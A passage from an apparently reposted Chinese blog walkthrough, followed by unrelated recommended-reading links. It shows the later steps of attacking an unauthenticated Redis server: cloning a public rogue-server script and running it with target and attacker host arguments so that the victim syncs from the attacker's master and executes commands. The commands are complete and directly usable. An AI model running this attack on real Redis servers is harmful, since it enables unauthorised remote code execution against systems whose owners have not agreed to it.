可以看到远端成功无权限访问我的 redis 数据库,并且可以插入数据
(5)在主机中 clone 攻击脚本(从土师傅的 git 上 fork 下来添加了个 .so)
git clone https://github.com/K0rz3n/redis-rogue-server-1.git(6)运行脚本
python3 redis-rogue-server.py --rhost 127.0.0.1 --rport 6666 --lhost xxx.xxx.xxx.xxx --lport 2333运行脚本后靶机就会把我们的 lhost 作为 master 然后自己做为 slave 了,并且会同步数据
靶机运行效果:
文章插图
流氓服务器运行效果:
文章插图
注:这里的 127 实际上是靶机,xxx 代表的是我的 “流氓服务器”
(7)查看现在的 redis 服务器
文章插图
可以看出来,现在的数据库以及沦为了只读模式的 slave
(8)执行命令
文章插图
原文:https://www.cnblogs.com/aishangJAVA/p/11261775.html
推荐阅读
- Redis快的秘诀
- 电饼铛第一次使用有烧焦味 电饼铛第一次用冒烟正常吗
- 主板怎么选?来看看这几款吧
- 抖音直播dou+推广有效果吗 抖音投放dou后对账号有什么影响吗
- 西山品虫茶
- 男生介绍对象是试探吗,男生把你推给另一个男生怎么回
- 对眼睛有帮助的食物,除了胡萝卜,还有什么食物
- 居家消毒,你做对了吗
- 汽车应该多少公里大保养一次,保养什么,多少钱
- 快手小店信息通知提醒